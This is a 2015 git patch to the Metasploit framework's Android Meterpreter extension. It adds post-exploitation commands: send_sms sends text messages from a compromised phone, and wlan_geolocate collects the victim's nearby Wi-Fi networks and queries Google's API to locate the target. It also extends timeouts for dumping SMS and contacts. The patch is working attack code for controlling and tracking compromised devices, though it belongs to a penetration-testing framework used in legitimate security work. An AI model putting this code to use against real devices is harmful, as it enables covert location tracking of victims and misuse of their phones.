From ad86a729187118f2733a23d64d233639ee9ecc7a Mon Sep 17 00:00:00 2001
From: Jack64 <somethingsyouneverforget@gmail.com>
Date: Mon, 20 Jul 2015 01:16:58 +0100
Subject: [PATCH] send_sms + wlan_geolocate

---
 .../meterpreter/extensions/android/android.rb |  38 +++++-
 .../meterpreter/extensions/android/tlv.rb     |   7 ++
 .../ui/console/command_dispatcher/android.rb  | 109 +++++++++++++++++-
 3 files changed, 150 insertions(+), 4 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index e36a27eb31..77d9901efd 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -44,7 +44,7 @@ class Android < Extension
   def dump_sms
     sms = Array.new
     request = Packet.create_request('dump_sms')
-    response = client.send_request(request)
+    response = client.send_request(request,60)
 
     response.each( TLV_TYPE_SMS_GROUP ) { |p|
 
@@ -64,7 +64,7 @@ class Android < Extension
   def dump_contacts
     contacts = Array.new
     request = Packet.create_request('dump_contacts')
-    response = client.send_request(request)
+    response = client.send_request(request,60)
 
     response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
 
@@ -119,6 +119,40 @@ class Android < Extension
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
   end
+
+  def send_sms(dest,body)
+    request = Packet.create_request('send_sms')
+    request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
+    request.add_tlv(TLV_TYPE_SMS_BODY,body)
+    response = client.send_request(request)
+    resp=response.get_tlv(TLV_TYPE_SMS_SENT).value
+    return resp
+  end
+
+  def wlan_geolocate
+    request = Packet.create_request('wlan_geolocate')
+    response = client.send_request(request,60)
+    networks=[]
+    response.each( TLV_TYPE_WLAN_GROUP ) { |p|
+
+      networks <<
+      {
+        'ssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_SSID).value),
+        'bssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_BSSID).value),
+        'level' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_LEVEL).value)
+      }
+
+    }
+    return networks
+#    response.get_tlv(TLV_TYPE_WLAN_STRING).value
+#    response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
+#	    wifi << {
+#		    'string' => p.get_tlv(TLV_TYPE_WLAN_STRING).value
+#	    }
+#    }
+#    return wifi
+#    response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
+  end
 end
 
 end
diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb
index 879afbe944..37232b9bbf 100644
--- a/lib/rex/post/meterpreter/extensions/android/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb
@@ -33,6 +33,13 @@ TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9019)
 
 TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9020)
 
+TLV_TYPE_SMS_SENT   = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9021)
+
+TLV_TYPE_WLAN_GROUP   = TLV_META_TYPE_GROUP      | (TLV_EXTENSIONS + 9022)
+TLV_TYPE_WLAN_BSSID   = TLV_META_TYPE_STRING      | (TLV_EXTENSIONS + 9023)
+TLV_TYPE_WLAN_SSID   = TLV_META_TYPE_STRING      | (TLV_EXTENSIONS + 9024)
+TLV_TYPE_WLAN_LEVEL   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9025)
+
 end
 end
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index a31638bc61..a71addd84a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -26,7 +26,9 @@ class Console::CommandDispatcher::Android
       'geolocate'         => 'Get current lat-long using geolocation',
       'dump_calllog'      => 'Get call log',
       'check_root'        => 'Check if device is rooted',
-      'device_shutdown'   => 'Shutdown device'
+      'device_shutdown'   => 'Shutdown device',
+      'send_sms'	  => 'Sends SMS from target session',
+      'wlan_geolocate'    => 'Get current lat-long using WLAN information',
     }
 
     reqs = {
@@ -35,7 +37,9 @@ class Console::CommandDispatcher::Android
       'geolocate'       => [ 'geolocate' ],
       'dump_calllog'    => [ 'dump_calllog' ],
       'check_root'      => [ 'check_root' ],
-      'device_shutdown' => [ 'device_shutdown']
+      'device_shutdown' => [ 'device_shutdown'],
+      'send_sms'	=> [ 'send_sms' ],
+      'wlan_geolocate'	=> [ 'wlan_geolocate' ]
     }
 
     # Ensure any requirements of the command are met
@@ -343,6 +347,7 @@ class Console::CommandDispatcher::Android
   end
 
 
+
   def cmd_check_root(*args)
 
     check_root_opts = Rex::Parser::Arguments.new(
@@ -368,6 +373,106 @@ class Console::CommandDispatcher::Android
     end
   end
 
+  def cmd_send_sms(*args)
+    send_sms_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ],
+      '-d' => [ true, 'Destination number' ],
+      '-t' => [ true, 'SMS body text' ]
+    )
+    dest=''
+    body=''
+    send_sms_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: send_sms -d <number> -t <sms body>')
+        print_line('Sends SMS messages to specified number.')
+        print_line(send_sms_opts.usage)
+        return
+      when '-d'
+	dest=val
+      when '-t'
+	body=val
+      end
+    }
+    if (dest.blank? or body.blank?)
+        print_error("You must enter both a destination address -d and the SMS text body -t")
+	print_error('e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."')
+        print_line(send_sms_opts.usage)
+	return
+    end
+    sent=client.android.send_sms(dest,body)
+    if (sent)
+        print_good('SMS sent')
+    else
+        print_status('SMS failed to send')
+    end
+  end
+
+  def cmd_wlan_geolocate(*args)
+
+    wlan_geolocate_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ]
+    )
+
+    wlan_geolocate_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: wlan_geolocate')
+        print_line('Tries to get device geolocation from WLAN information and Google\'s API')
+        print_line(wlan_geolocate_opts.usage)
+        return
+      end
+    }
+
+    log = client.android.wlan_geolocate
+    wlan_list=''
+    log.each{|x|
+	mac=x['bssid']
+	ssid=x['ssid']
+	ss=x['level']
+	network_data = "&wifi=mac:#{mac}|ssid:#{ssid}|ss=#{ss}"
+	wlan_list << network_data
+#	print_status(x['ssid']+" ("+x['bssid']+") pwr: "+x['level'].to_s())
+    }
+
+    if wlan_list.blank?
+      print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
+      return
+    end
+
+    # Build and send the request to Google
+    url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
+    uri = URI.parse(URI.encode(url))
+    request = Net::HTTP::Get.new(uri.request_uri)
+    http = Net::HTTP::new(uri.host,uri.port)
+    http.use_ssl = true
+    response = http.request(request)
+
+    # Gather the required information from the response
+    if response && response.code == '200'
+      results = JSON.parse(response.body)
+      latitude =  results["location"]["lat"]
+      longitude = results["location"]["lng"]
+      accuracy = results["accuracy"]
+      print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
+      print_status("Google Maps URL:  https://maps.google.com/?q=#{latitude},#{longitude}")
+    else
+      print_error("Failure connecting to Google for location lookup.")
+    end
+
+#    print_status(log)
+#    log.each{|x|
+#	print_line(x)
+#    }
+    #if is_rooted
+    #  print_good('Device is rooted')
+    #elsif
+    #  print_status('Device is not rooted')
+    #end
+  end
+
+
+
   #
   # Name for this dispatcher
   #